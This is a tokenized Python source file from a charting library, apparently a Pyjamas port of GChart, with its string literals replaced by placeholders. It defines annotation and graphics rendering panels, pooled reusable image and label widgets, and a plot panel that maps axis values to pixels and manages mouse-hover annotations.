DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontWeight ) <EOL> self . fontWeight = fontWeight <EOL> if self . fontColor != fontColor : <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontColor ) <EOL> self . fontColor = fontColor <EOL> if self . hAlign != hAlign : <EOL> self . getCellFormatter ( ) . 
setHorizontalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , hAlign ) <EOL> self . innerGrid . getCellFormatter ( ) . setHorizontalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , hAlign ) <EOL> self . hAlign = hAlign <EOL> if self . vAlign != vAlign : <EOL> self . getCellFormatter ( ) . setVerticalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , vAlign ) <EOL> self . innerGrid . getCellFormatter ( ) . setVerticalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , vAlign ) <EOL> self . vAlign = vAlign <EOL> if None != labelWidget : <EOL> if self . labelWidget != labelWidget : <EOL> self . innerGrid . setWidget ( <NUM_LIT:0> , <NUM_LIT:0> , labelWidget ) <EOL> self . labelWidget = labelWidget <EOL> self . labelText = None <EOL> elif self . labelText != labelText or self . isHTML != isHTML : <EOL> if None == labelText or "<STR_LIT>" == labelText : <EOL> self . innerGrid . setText ( <NUM_LIT:0> , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> elif not isHTML : <EOL> self . innerGrid . setText ( <NUM_LIT:0> , <NUM_LIT:0> , labelText ) <EOL> else : <EOL> self . innerGrid . setHTML ( <NUM_LIT:0> , <NUM_LIT:0> , labelText ) <EOL> self . isHTML = isHTML <EOL> self . labelText = labelText <EOL> self . labelWidget = None <EOL> """<STR_LIT>""" <EOL> class AnnotationRenderingPanel ( PartitionedAbsolutePanel ) : <EOL> """<STR_LIT>""" <EOL> def getFirstInnerAlignedLabel ( self ) : <EOL> result = None <EOL> if self . labelIndex > <NUM_LIT:0> : <EOL> parent = self . getWidget ( <NUM_LIT:0> ) <EOL> result = parent . getInnerGrid ( ) <EOL> return result <EOL> def __init__ ( self , chart ) : <EOL> self . chart = chart <EOL> self . labelIndex = <NUM_LIT:0> ; <EOL> self . lastVisibleLabel = - <NUM_LIT:1> ; <EOL> PartitionedAbsolutePanel . __init__ ( self ) <EOL> """<STR_LIT>""" <EOL> GChartUtil . setOverflow ( self , "<STR_LIT>" ) <EOL> self . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def setLabelPosition ( self , lbl , x , y ) : <EOL> if x == - <NUM_LIT:1> and y == - <NUM_LIT:1> : <EOL> x = <NUM_LIT:0> <EOL> self . 
setWidgetPosition ( lbl , x , y ) <EOL> def beginRendering ( self ) : <EOL> self . labelIndex = <NUM_LIT:0> <EOL> def endRendering ( self ) : <EOL> if self . chart . optimizeForMemory : <EOL> iLabel = ( self . getWidgetCount ( ) - <NUM_LIT:1> ) <EOL> else : <EOL> iLabel = self . lastVisibleLabel <EOL> while iLabel >= self . labelIndex : <EOL> w = self . getWidget ( iLabel ) <EOL> if self . chart . optimizeForMemory : <EOL> self . remove ( iLabel ) <EOL> else : <EOL> w . setVisible ( False ) <EOL> iLabel -= <NUM_LIT:1> <EOL> self . lastVisibleLabel = self . labelIndex - <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> def getNextOrNewAlignedLabel ( self , fontSize , fontStyle , fontWeight , fontColor , hAlign , vAlign , labelText , isHTML , labelWidget ) : <EOL> if self . labelIndex < self . getWidgetCount ( ) : <EOL> result = self . getWidget ( self . labelIndex ) <EOL> if None != result . labelWidget and labelWidget == result . labelWidget : <EOL> """<STR_LIT>""" <EOL> e = labelWidget . getElement ( ) <EOL> if ( None == e or <EOL> ( DOM . getParent ( e ) != <EOL> result . innerGrid . getCellFormatter ( ) . getElement ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) : <EOL> result . labelWidget = None <EOL> if self . labelIndex > self . lastVisibleLabel : <EOL> result . setVisible ( True ) <EOL> else : <EOL> result = NonoccludingReusuableAlignedLabel ( ) <EOL> self . add ( result ) <EOL> result . setReusableProperties ( fontSize , fontStyle , fontWeight , <EOL> fontColor , hAlign , vAlign , <EOL> labelText , isHTML , labelWidget ) <EOL> if self . lastVisibleLabel < self . labelIndex : <EOL> self . lastVisibleLabel = self . labelIndex <EOL> self . labelIndex += <NUM_LIT:1> <EOL> return result <EOL> def renderAnnotation ( self , annotation , loc , xCenter , yCenter , symWidth , symHeight , symbol ) : <EOL> widthUpperBound = annotation . getWidthUpperBound ( ) <EOL> upLeftX = loc . getUpperLeftX ( xCenter , widthUpperBound , abs ( symWidth ) ) <EOL> heightUpperBound = annotation . 
getHeightUpperBound ( ) <EOL> upLeftY = loc . getUpperLeftY ( yCenter , heightUpperBound , abs ( symHeight ) ) <EOL> alignedLabel = self . getNextOrNewAlignedLabel ( <EOL> annotation . getFontSize ( ) , <EOL> annotation . getFontStyle ( ) , <EOL> annotation . getFontWeight ( ) , <EOL> annotation . getFontColor ( ) , <EOL> loc . getHorizontalAlignment ( ) , <EOL> loc . getVerticalAlignment ( ) , <EOL> annotation . getText ( ) , annotation . isHTML ( ) , <EOL> annotation . getWidget ( ) ) <EOL> if loc . getHorizontalAlignment ( ) != HasHorizontalAlignment . ALIGN_LEFT : <EOL> alignedLabel . setWidth ( str ( widthUpperBound ) + "<STR_LIT>" ) <EOL> else : <EOL> alignedLabel . setWidth ( "<STR_LIT>" ) <EOL> if loc . getVerticalAlignment ( ) != HasVerticalAlignment . ALIGN_TOP : <EOL> alignedLabel . setHeight ( str ( heightUpperBound ) + "<STR_LIT>" ) <EOL> else : <EOL> alignedLabel . setHeight ( "<STR_LIT>" ) <EOL> self . setLabelPosition ( alignedLabel , upLeftX , upLeftY ) <EOL> """<STR_LIT>""" <EOL> class ReusableImage ( Image ) : <EOL> def __init__ ( self , parent ) : <EOL> self . _parent = parent <EOL> self . backgroundColor = USE_CSS <EOL> self . borderColor = USE_CSS <EOL> self . borderStyle = USE_CSS <EOL> self . cappedBorderWidthX2 = NAI <EOL> self . width = NAI <EOL> self . height = NAI <EOL> self . x = NAI <EOL> self . y = NAI <EOL> self . url = None <EOL> Image . 
__init__ ( self ) <EOL> def setReusableProperties ( self , backgroundColor , borderColor , borderStyle , borderWidth , dWidth , dHeight , xD , yD , url ) : <EOL> newX = int ( round ( xD ) ) <EOL> newW = int ( round ( xD + dWidth ) - newX ) <EOL> newY = int ( round ( yD ) ) <EOL> newH = int ( round ( yD + dHeight ) - newY ) <EOL> thickness = min ( newW , newH ) <EOL> newCappedBorderWidthX2 = min ( <NUM_LIT:2> * borderWidth , thickness ) <EOL> """<STR_LIT>""" <EOL> if TRANSPARENT_BORDER_COLOR == borderColor : <EOL> if newCappedBorderWidthX2 > <NUM_LIT:0> : <EOL> newX += newCappedBorderWidthX2 / <NUM_LIT:2> ; <EOL> newY += newCappedBorderWidthX2 / <NUM_LIT:2> <EOL> newH -= newCappedBorderWidthX2 ; <EOL> newW -= newCappedBorderWidthX2 <EOL> newCappedBorderWidthX2 = <NUM_LIT:0> <EOL> borderColor = "<STR_LIT>" ; <EOL> if backgroundColor == TRANSPARENT_BORDER_COLOR : <EOL> backgroundColor = "<STR_LIT>" <EOL> elif newCappedBorderWidthX2 < <NUM_LIT:0> : <EOL> newX += newCappedBorderWidthX2 / <NUM_LIT:2> ; <EOL> newY += newCappedBorderWidthX2 / <NUM_LIT:2> ; <EOL> else : <EOL> newH -= newCappedBorderWidthX2 ; <EOL> newW -= newCappedBorderWidthX2 ; <EOL> if self . cappedBorderWidthX2 != newCappedBorderWidthX2 : <EOL> if <NUM_LIT:1> == ( newCappedBorderWidthX2 % <NUM_LIT:2> ) : <EOL> floorBW = int ( newCappedBorderWidthX2 / <NUM_LIT:2> ) <EOL> ceilBW = floorBW + <NUM_LIT:1> <EOL> DOM . setStyleAttribute ( self . getElement ( ) , <EOL> "<STR_LIT>" , <EOL> str ( floorBW ) + "<STR_LIT>" + str ( floorBW ) + "<STR_LIT>" + <EOL> str ( ceilBW ) + "<STR_LIT>" + str ( ceilBW ) + "<STR_LIT>" ) <EOL> else : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , <EOL> "<STR_LIT>" , str ( abs ( newCappedBorderWidthX2 / <NUM_LIT:2> ) ) + "<STR_LIT>" ) <EOL> self . cappedBorderWidthX2 = newCappedBorderWidthX2 <EOL> if NAI == self . x : <EOL> self . _parent . setImagePosition ( self , newX , newY ) <EOL> self . x = newX <EOL> self . y = newY <EOL> else : <EOL> if self . 
x != newX : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT:left>" , str ( newX ) + "<STR_LIT>" ) <EOL> self . x = newX <EOL> if self . y != newY : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , str ( newY ) + "<STR_LIT>" ) <EOL> self . y = newY <EOL> if self . width != newW : <EOL> self . setWidth ( str ( newW ) + "<STR_LIT>" ) <EOL> self . width = newW <EOL> if self . height != newH : <EOL> self . setHeight ( str ( newH ) + "<STR_LIT>" ) <EOL> self . height = newH <EOL> if self . backgroundColor != backgroundColor : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , <EOL> backgroundColor ) <EOL> self . backgroundColor = backgroundColor <EOL> if self . borderColor != borderColor : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , borderColor ) <EOL> self . borderColor = borderColor <EOL> if self . borderStyle != borderStyle : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , borderStyle ) <EOL> self . borderStyle = borderStyle <EOL> if self . url != url : <EOL> """<STR_LIT>""" <EOL> self . setUrl ( url ) <EOL> self . url = url <EOL> """<STR_LIT>""" <EOL> class GraphicsRenderingPanel ( AbsolutePanel ) : <EOL> def maybeAddCanvas ( self ) : <EOL> canvasFactory = self . chart . getCanvasFactory ( ) <EOL> if None != canvasFactory and None == self . canvas : <EOL> self . canvas = canvasFactory . create ( ) <EOL> if None != self . canvas : <EOL> if isinstance ( self . canvas , Widget ) : <EOL> """<STR_LIT>""" <EOL> DOM . setElemAttribute ( self . canvas . getElement ( ) , <EOL> "<STR_LIT>" , "<STR_LIT:left>" ) <EOL> self . canvasPanel . add ( self . canvas , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> else : <EOL> raise IllegalStateException ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , chart , ** kwargs ) : <EOL> self . chart = chart <EOL> self . canvas = None <EOL> self . x0 = <NUM_LIT:0> ; <EOL> self . y0 = <NUM_LIT:0> ; <EOL> self . 
canvasWidth = <NUM_LIT:0> ;  # continuation of "self ." from the previous source line: initialises self.canvasWidth
        self.canvasHeight = <NUM_LIT:0> ;
        # Two child surfaces: a canvas panel for vector drawing and an image
        # panel whose <img> children are pooled and reused between renders.
        self.canvasPanel = AbsolutePanel()
        self.imagePanel = PartitionedAbsolutePanel()
        self.imageIndex = <NUM_LIT:0>          # next pooled-image slot to (re)use this pass
        self.lastVisibleImage = -<NUM_LIT:1>   # index of the last image still visible
        AbsolutePanel.__init__(self, **kwargs)
        GChartUtil.setOverflow(self.canvasPanel, "<STR_LIT>")
        GChartUtil.setOverflow(self.imagePanel, "<STR_LIT>")
        self.canvasPanel.setPixelSize(<NUM_LIT:0>, <NUM_LIT:0>)
        self.imagePanel.setPixelSize(<NUM_LIT:0>, <NUM_LIT:0>)
        self.add(self.canvasPanel, <NUM_LIT:0>, <NUM_LIT:0>)
        self.add(self.imagePanel, <NUM_LIT:0>, <NUM_LIT:0>)

    def getCanvas(self):
        # Accessor for the external canvas widget (set elsewhere in the class).
        return self.canvas

    def setImagePosition(self, img, x, y):
        # NOTE(review): the (-1, -1) pair appears to be a sentinel for an
        # unpositioned image; only x is reset to 0 here -- confirm intent.
        if x == -<NUM_LIT:1> and y == -<NUM_LIT:1>:
            x = <NUM_LIT:0>
        self.imagePanel.setWidgetPosition(img, x, y)

    def beginRendering(self, canvasRegion):
        # Prepare the canvas for a new rendering pass; a None region empties it.
        if None != self.canvas:
            if None == canvasRegion:
                self.canvas.resize(<NUM_LIT:0>, <NUM_LIT:0>)
                self.canvasWidth = self.canvasHeight = <NUM_LIT:0>
            else:
                width = int(round(canvasRegion.width))
                height = int(round(canvasRegion.height))
                if width == self.canvasWidth and height == self.canvasHeight:
                    # Same size: clearing is cheaper than a resize.
                    self.canvas.clear();
                else:
                    self.canvas.resize(width, height)
                    self.canvasWidth = width
                    self.canvasHeight = height
                self.x0 = int(round(canvasRegion.x))
                self.y0 = int(round(canvasRegion.y))
                if self.x0 == -<NUM_LIT:1> and self.y0 == -<NUM_LIT:1>:
                    self.x0 = <NUM_LIT:0>
                self.canvasPanel.setWidgetPosition(self.canvas, self.x0, self.y0)
        # Restart reuse of the pooled images from slot 0.
        self.imageIndex = <NUM_LIT:0>

    def endRendering(self):
        # Remove (or merely hide, when optimising for speed over memory)
        # every pooled image that this pass did not reuse.
        if self.chart.optimizeForMemory:
            iImage = (self.imagePanel.getWidgetCount() - <NUM_LIT:1>)
        else:
            iImage = self.lastVisibleImage
        while iImage >= self.imageIndex:
            w = self.imagePanel.getWidget(iImage)
            if self.chart.optimizeForMemory:
                self.imagePanel.remove(iImage)
            else:
                DOM.setStyleAttribute(w.getElement(), "<STR_LIT>", "<STR_LIT>")
            iImage -= <NUM_LIT:1>
        self.lastVisibleImage = self.imageIndex - <NUM_LIT:1>

    """<STR_LIT>"""
    def addOrRevealImage(self, backgroundColor, borderColor, borderStyle, borderWidth, width, height, x, y, url):
        # Reuse the image at the current slot if one exists, otherwise grow
        # the pool; then configure it and advance the slot cursor.
        if self.imageIndex < self.imagePanel.getWidgetCount():
            img = self.imagePanel.getWidget(self.imageIndex)
            if self.imageIndex > self.lastVisibleImage:
                # Slot exists but was hidden by a previous endRendering.
                DOM.setStyleAttribute(img.getElement(), "<STR_LIT>", "<STR_LIT>")
        else:
            img = ReusableImage(self)
            self.imagePanel.add(img)
        img.setReusableProperties(backgroundColor,
                                  borderColor,
                                  borderStyle,
                                  borderWidth,
                                  width,
                                  height,
                                  x, y, url)
        if self.lastVisibleImage < self.imageIndex:
            self.lastVisibleImage = self.imageIndex
        self.imageIndex += <NUM_LIT:1>

    def renderBorderedImage(self, backgroundColor, borderColor, borderStyle, borderWidth, width, height, x, y, url):
        # Thin alias kept for the renderer interface.
        self.addOrRevealImage(backgroundColor,
                              borderColor,
                              borderStyle,
                              borderWidth,
                              width,
                              height,
                              x, y, url)


# Index of the rendering panel reserved for chart decorations.
DECORATIVE_RENDERING_PANEL_INDEX = <NUM_LIT:0>


class PlotPanel(AbsolutePanel):
    # The chart's central plotting surface: owns one sub-panel for graphics
    # and one for annotations, tracks mouse state, and maps between model
    # (x, y) coordinates and pixel coordinates.
    def __init__(self, chart, **kwargs):
        self.chart = chart
        # Hover/touch state machine.
        self.touchedPoint = None
        self.touchedHoverWidget = None
        self.insideHoverUpdate = False
        self.insideHoverCleanup = False
        # Axis limits; NaN means "not yet set by reset()".
        self.xMax = Double.NaN
        self.xMin = Double.NaN
        self.y2Max = Double.NaN
        self.y2Min = Double.NaN
        self.yMax = Double.NaN
        self.yMin = Double.NaN
        # Last known mouse coordinates; NAI is the "not an integer" sentinel.
        self.clientX = NAI
        self.clientY = NAI
        self.xMouse = NAI
        self.yMouse = NAI
        self.graphicsPanel = AbsolutePanel()
        self.annotationPanel = AbsolutePanel()
        AbsolutePanel.__init__(self, **kwargs)
        GChartUtil.setOverflow(self, "<STR_LIT>")
        GChartUtil.setOverflow(self.graphicsPanel, "<STR_LIT>")
        GChartUtil.setOverflow(self.annotationPanel, "<STR_LIT>")
        self.graphicsPanel.setPixelSize(<NUM_LIT:0>, <NUM_LIT:0>)
        self.annotationPanel.setPixelSize(<NUM_LIT:0>, <NUM_LIT:0>)
        self.add(self.graphicsPanel, <NUM_LIT:0>, <NUM_LIT:0>)
        self.add(self.annotationPanel, <NUM_LIT:0>, <NUM_LIT:0>)
        self.sinkEvents(Event.ONMOUSEMOVE | Event.ONMOUSEOUT |
                        Event.ONCLICK | Event.ONMOUSEOVER)

    """<STR_LIT>"""
    def addGraphicsRenderingPanel(self, rpIndex):
        domInsert = True  # NOTE(review): assigned but never used
        w = GraphicsRenderingPanel(self.chart)
        # Decorative and hover-feedback panels (or charts that do not clip)
        # get a zero-size, overflow-visible panel; others clip to plot area.
        if (DECORATIVE_RENDERING_PANEL_INDEX == rpIndex or
            self.chart.isHoverFeedbackRenderingPanel(rpIndex) or
            not self.chart.getClipToPlotArea()):
            w.setPixelSize(<NUM_LIT:0>, <NUM_LIT:0>)
            GChartUtil.setOverflow(w, "<STR_LIT>")
        else:
            w.setPixelSize(self.getXChartSize(), self.getYChartSize())
            GChartUtil.setOverflow(w, "<STR_LIT>")
        self.graphicsPanel.insert(w, self.graphicsPanel.getElement(), rpIndex)
        self.graphicsPanel.setWidgetPosition(w, <NUM_LIT:0>, <NUM_LIT:0>)

    """<STR_LIT>"""
    def addAnnotationRenderingPanel(self, rpIndex):
        domInsert = True  # NOTE(review): assigned but never used
        w = AnnotationRenderingPanel(self.chart)
        self.annotationPanel.insert(w, self.annotationPanel.getElement(),
                                    rpIndex)
        self.annotationPanel.setWidgetPosition(w, <NUM_LIT:0>, <NUM_LIT:0>)

    """<STR_LIT>"""
    def removeGraphicsRenderingPanel(self, rpIndex):
        self.graphicsPanel.remove(rpIndex)

    def removeAnnotationRenderingPanel(self, rpIndex):
        self.annotationPanel.remove(rpIndex)

    """<STR_LIT>"""
    def getGraphicsRenderingPanel(self, rpIndex):
        # Lazily build every rendering panel the first time one is requested.
        if <NUM_LIT:0> == self.graphicsPanel.getWidgetCount():
            for i in range(N_PRE_SYSTEM_CURVES - <NUM_LIT:1>, len(self.chart.curves)):
                rpInd = self.chart.getRenderingPanelIndex(i)
                self.addGraphicsRenderingPanel(rpInd)
        return self.graphicsPanel.getWidget(rpIndex)

    def getAnnotationRenderingPanel(self, rpIndex):
        # Mirrors getGraphicsRenderingPanel for the annotation layer.
        if <NUM_LIT:0> == self.annotationPanel.getWidgetCount():
            for i in range(N_PRE_SYSTEM_CURVES - <NUM_LIT:1>, len(self.chart.curves)):
                rpInd = self.chart.getRenderingPanelIndex(i)
                self.addAnnotationRenderingPanel(rpInd)
        return self.annotationPanel.getWidget(rpIndex)

    def getClientX(self):
        return self.clientX

    def setClientX(self, clientX, isClick):
        """<STR_LIT>"""
        # Browsers can report bogus non-positive click coordinates; keep the
        # previous value on a click, otherwise map negatives to the sentinel.
        if clientX <= <NUM_LIT:0> and isClick:
            return
        elif clientX < <NUM_LIT:0>:
            clientX = NAI
        self.clientX = clientX
        if (NAI == clientX):
            self.xMouse = NAI
        else:
            self.xMouse = (Window.getScrollLeft() + clientX -
                           self.getAbsoluteLeft())

    def getClientY(self):
        return self.clientY

    def setClientY(self, clientY, isClick):
        # Same repair logic as setClientX, for the vertical coordinate.
        if clientY <= <NUM_LIT:0> and isClick:
            return
        elif clientY < <NUM_LIT:0>:
            clientY = NAI
        self.clientY = clientY
        if (NAI == clientY):
            self.yMouse = NAI
        else:
            self.yMouse = (Window.getScrollTop() + clientY -
                           self.getAbsoluteTop())

    """<STR_LIT>"""
    def repairBadClientX(self, x):
        # Substitute the last good coordinate for a bogus (<= 0) one.
        if x <= <NUM_LIT:0>:
            return self.clientX
        else:
            return x

    def repairBadClientY(self, y):
        if y <= <NUM_LIT:0>:
            return self.clientY
        else:
            return y

    def getXMouse(self):
        return self.xMouse

    def getYMouse(self):
        return self.yMouse

    def getXMousePlotArea(self):
        # Mouse x relative to the plot area (excludes the y-axis band).
        result = self.xMouse - self.yAxisEnsembleWidth
        return result

    def getYMousePlotArea(self):
        # Mouse y relative to the plot area (excludes the title margin).
        result = self.yMouse - self.topMargin
        return result

    def getXAxisEnsembleHeight(self):
        return self.xAxisEnsembleHeight

    def getXMax(self):
        return self.xMax

    def getXMin(self):
        return self.xMin

    def getY2AxisEnsembleWidth(self):
        return self.y2AxisEnsembleWidth

    def getY2Max(self):
        return self.y2Max

    def getY2Min(self):
        return self.y2Min

    def getYAxisEnsembleWidth(self):
        return self.yAxisEnsembleWidth

    def legendThickness(self):
        return self.chartLegendThickness

    def chartFootnotesThickness(self):
        # NOTE(review): reset() assigns an instance attribute with this same
        # name, which shadows this method afterwards -- confirm intended.
        return self.chartFootnotesThickness

    def chartTitleThickness(self):
        return self.topMargin

    def getYMax(self):
        return self.yMax

    def getYMin(self):
        return self.yMin

    def reset(self, xChartSize, yChartSize, hasYAxis, hasY2Axis, xAxis, yAxis, y2Axis):
        # Recompute cached geometry from the chart model before a redraw.
        self.chart.getXAxis().maybePopulateTicks()
        self.chart.getYAxis().maybePopulateTicks()
        self.chart.getY2Axis().maybePopulateTicks()
        self.xChartSize = xChartSize
        self.yChartSize = yChartSize
        axisLimits = xAxis.getAxisLimits()
        self.xMin = axisLimits.min
        self.xMax = axisLimits.max
        axisLimits = yAxis.getAxisLimits()
        self.yMin = axisLimits.min
        self.yMax = axisLimits.max
        axisLimits = y2Axis.getAxisLimits()
        self.y2Min = axisLimits.min
        self.y2Max = axisLimits.max
        self.topMargin = self.chart.getChartTitleThickness()
        # Each "ensemble" is the full band an axis occupies: label + tick
        # labels + tick marks + padding.
        self.xAxisEnsembleHeight = (xAxis.getAxisLabelThickness() +
                                    xAxis.getTickLabelThickness(False) +
                                    xAxis.getTickSpace() +
                                    xAxis.getTickLabelPadding())
        self.yAxisEnsembleWidth = (yAxis.getAxisLabelThickness() +
                                   yAxis.getTickLabelThickness(False) +
                                   yAxis.getTickSpace() +
                                   yAxis.getTickLabelPadding())
        self.y2AxisEnsembleWidth = (y2Axis.getAxisLabelThickness() +
                                    y2Axis.getTickLabelThickness(False) +
                                    y2Axis.getTickSpace() +
                                    y2Axis.getTickLabelPadding())
        self.chartLegendThickness = self.chart.getLegendThickness()
        # NOTE(review): this attribute shadows the methods of the same names
        # defined above once reset() has run.
        self.chartFootnotesThickness = self.chart.getChartFootnotesThickness()
        self.setPixelSize(self.getXChartSizeDecoratedQuickly(),
                          self.getYChartSizeDecoratedQuickly())
        self.setWidgetPosition(self.graphicsPanel, self.yAxisEnsembleWidth, self.topMargin)
        self.setWidgetPosition(self.annotationPanel, self.yAxisEnsembleWidth, self.topMargin)
        for i in range(self.getRenderingPanelCount()):
            grp = self.graphicsPanel.getWidget(i)
            if (DECORATIVE_RENDERING_PANEL_INDEX == i or
                self.chart.isHoverFeedbackRenderingPanel(i) or
                not self.chart.getClipToPlotArea()):
                grp.setPixelSize(<NUM_LIT:0>, <NUM_LIT:0>)
                GChartUtil.setOverflow(grp, "<STR_LIT>")
            else:
                grp.setPixelSize(self.getXChartSize(), self.getYChartSize())
                GChartUtil.setOverflow(grp, "<STR_LIT>")

    def xToChartPixel(self, x):
        # Model x -> pixel within the whole decorated chart.
        # +/-Double.MAX_VALUE are sentinels for "pin to plot-area edge".
        result = Double.NaN
        if -Double.MAX_VALUE == x:
            result = self.yAxisEnsembleWidth
        elif Double.MAX_VALUE == x:
            result = self.yAxisEnsembleWidth + self.xChartSize - <NUM_LIT:1.0>
        elif not (Double.NaN == (x)):
            result = ((self.yAxisEnsembleWidth * (self.xMax - x) +
                       (self.yAxisEnsembleWidth + self.xChartSize - <NUM_LIT:1.0>) * (x - self.xMin)) /
                      (self.xMax - self.xMin))
        return result

    def xToPixel(self, x):
        # Model x -> pixel within the plot area only.
        result = Double.NaN
        if -Double.MAX_VALUE == x:
            result = <NUM_LIT:0>
        elif Double.MAX_VALUE == x:
            result = self.xChartSize - <NUM_LIT:1.0>
        elif not (Double.NaN == (x)):
            result = (self.xChartSize - <NUM_LIT:1.0>) * (x - self.xMin) / (self.xMax - self.xMin)
        return result

    def xChartPixelToX(self, xPx):
        # Inverse of xToChartPixel.
        result = Double.NaN
        if NAI != xPx and self.xChartSize > <NUM_LIT:1>:
            result = (self.xMin + (self.xMax - self.xMin) *
                      (xPx - self.yAxisEnsembleWidth) / (self.xChartSize - <NUM_LIT:1.>))
        return result

    def xPixelToX(self, xPx):
        # Inverse of xToPixel.
        result = Double.NaN
        if NAI != xPx and self.xChartSize > <NUM_LIT:1>:
            result = self.xMin + (self.xMax - self.xMin) * xPx / (self.xChartSize - <NUM_LIT:1.>)
        return result

    def dxToPixel(self, dx):
        # Model x-distance -> pixel distance.
        result = (dx * (self.xChartSize - <NUM_LIT:1>)) / (self.xMax - self.xMin)
        return result

    def yToChartPixel(self, y, isY2):
        # Model y -> pixel within the decorated chart; isY2 selects the axis.
        if isY2:
            minY = self.y2Min
            maxY = self.y2Max
        else:
            minY = self.yMin
            maxY = self.yMax
        result = Double.NaN
        if -Double.MAX_VALUE == y:
            result = self.yChartSize + self.topMargin - <NUM_LIT:1.0>
        elif Double.MAX_VALUE == y:
            result = self.topMargin
        elif not (Double.NaN == (y)):
            result = (self.topMargin * (y - minY) +
                      ((self.yChartSize + self.topMargin - <NUM_LIT:1.0>) *
                       (maxY - y))) / (maxY - minY)
        return result

    def yToPixel(self, y, isY2):
        # Model y -> pixel within the plot area (y grows downward).
        if isY2:
            minY = self.y2Min
            maxY = self.y2Max
        else:
            minY = self.yMin
            maxY = self.yMax
        result = Double.NaN
        if -Double.MAX_VALUE == y:
            result = self.yChartSize - <NUM_LIT:1.0>
        elif Double.MAX_VALUE == y:
            result = <NUM_LIT:0>
        elif not (Double.NaN == (y)):
            result = (self.yChartSize - <NUM_LIT:1.0>) * (maxY - y) / (maxY - minY)
        return result

    def yChartPixelToY(self, yPx):
        result = Double.NaN
        if NAI != yPx and self.yChartSize > <NUM_LIT:1>:
            result = self.yMax + (self.yMin - self.yMax) * (yPx - self.topMargin) / (self.yChartSize - <NUM_LIT:1.>)
        return result

    def yPixelToY(self, yPx):
        result = Double.NaN
        if NAI != yPx and self.yChartSize > <NUM_LIT:1>:
            result = self.yMax + (self.yMin - self.yMax) * yPx / (self.yChartSize - <NUM_LIT:1.>)
        return result

    def yChartPixelToY2(self, yPx):
        result = Double.NaN
        if NAI != yPx and self.yChartSize > <NUM_LIT:1>:
            result = self.y2Max + (self.y2Min - self.y2Max) * (yPx - self.topMargin) / (self.yChartSize - <NUM_LIT:1.>)
        return result

    def yPixelToY2(self, yPx):
        result = Double.NaN
        if NAI != yPx and self.yChartSize > <NUM_LIT:1>:
            result = self.y2Max + (self.y2Min - self.y2Max) * yPx / (self.yChartSize - <NUM_LIT:1.>)
        return result

    def dyToPixel(self, dy, isY2):
        # Model y-distance -> pixel distance on the selected y axis.
        if isY2:
            minY = self.y2Min
            maxY = self.y2Max
        else:
            minY = self.yMin
            maxY = self.yMax
        result = (dy * (self.yChartSize - <NUM_LIT:1>)) / (maxY - minY)
        return result

    def getOpenedHoverContainer(self):
        # Return the widget holding the currently opened hover annotation,
        # or None when no hover popup is showing.
        result = None
        c = self.chart.getSystemCurve(HOVER_ANNOTATION_ID)
        if self.touchedPoint is not None and c.isVisible():
            internalIndex = self.chart.getInternalCurveIndex(c)
            rpIndex = self.chart.getRenderingPanelIndex(internalIndex)
            arp = self.getAnnotationRenderingPanel(rpIndex)
            result = arp.getFirstInnerAlignedLabel()
        return result

    def getOpenedHoverElement(self):
        hoverContainer = self.getOpenedHoverContainer()
        return hoverContainer and hoverContainer.getElement() or None

    """<STR_LIT>"""
    def touch(self, p):
        # Make point p the "touched" point: tear down any previous hover
        # widget, then configure the hover-annotation and hover-cursor
        # system curves to reflect the newly touched point (or hide them
        # when p is None).
        prevTouchedPoint = self.touchedPoint
        self.touchedPoint = p
        cAnnotation = self.chart.getSystemCurve(HOVER_ANNOTATION_ID)
        cCursor = self.chart.getSystemCurve(HOVER_CURSOR_ID)
        cTouched = p and p.getParent() or None
        if None != self.touchedHoverWidget:
            # insideHoverCleanup guards against re-entrant cleanup calls.
            if not self.insideHoverCleanup:
                try:
                    self.insideHoverCleanup = True
                    self.touchedHoverWidget.hoverCleanup(prevTouchedPoint)
                except:
                    # NOTE(review): deliberately swallows user hover-widget
                    # errors so a faulty callback cannot break the chart.
                    pass
                self.insideHoverCleanup = False
        self.touchedHoverWidget = cTouched and cTouched.getSymbol().getHoverWidget() or None
        if None == self.touchedHoverWidget:
            # Plain-text hover annotation.
            if None != p:
                hovertext = p.getHovertext()
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationText(hovertext,
                    cTouched.getSymbol().getHoverAnnotation().widthUpperBound,
                    cTouched.getSymbol().getHoverAnnotation().heightUpperBound)
        else:
            # Widget-based hover annotation; guard against re-entrancy too.
            if not self.insideHoverUpdate:
                try:
                    self.insideHoverUpdate = True
                    self.touchedHoverWidget.hoverUpdate(p)
                except:
                    pass
                self.insideHoverUpdate = False
            cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationWidget(
                self.touchedHoverWidget,
                cTouched.getSymbol().getHoverAnnotation().widthUpperBound,
                cTouched.getSymbol().getHoverAnnotation().heightUpperBound)
        if None == p:
            cAnnotation.setVisible(False)
            cCursor.setVisible(False)
        else:
            if not cTouched.getSymbol().getHoverAnnotationEnabled():
                cAnnotation.setVisible(False)
            else:
                # Copy the touched symbol's hover-related properties onto the
                # system annotation curve.
                cAnnotation.setVisible(True)
                cAnnotation.setYAxis(cTouched.getYAxis())
                cAnnotation.getPoint(<NUM_LIT:0>).setX(p.getX())
                cAnnotation.getPoint(<NUM_LIT:0>).setY(p.getY())
                cAnnotation.getSymbol().copy(cTouched.getSymbol())
                cAnnotation.getSymbol().setImageURL(
                    DEFAULT_BLANK_IMAGE_URL_FULLPATH)
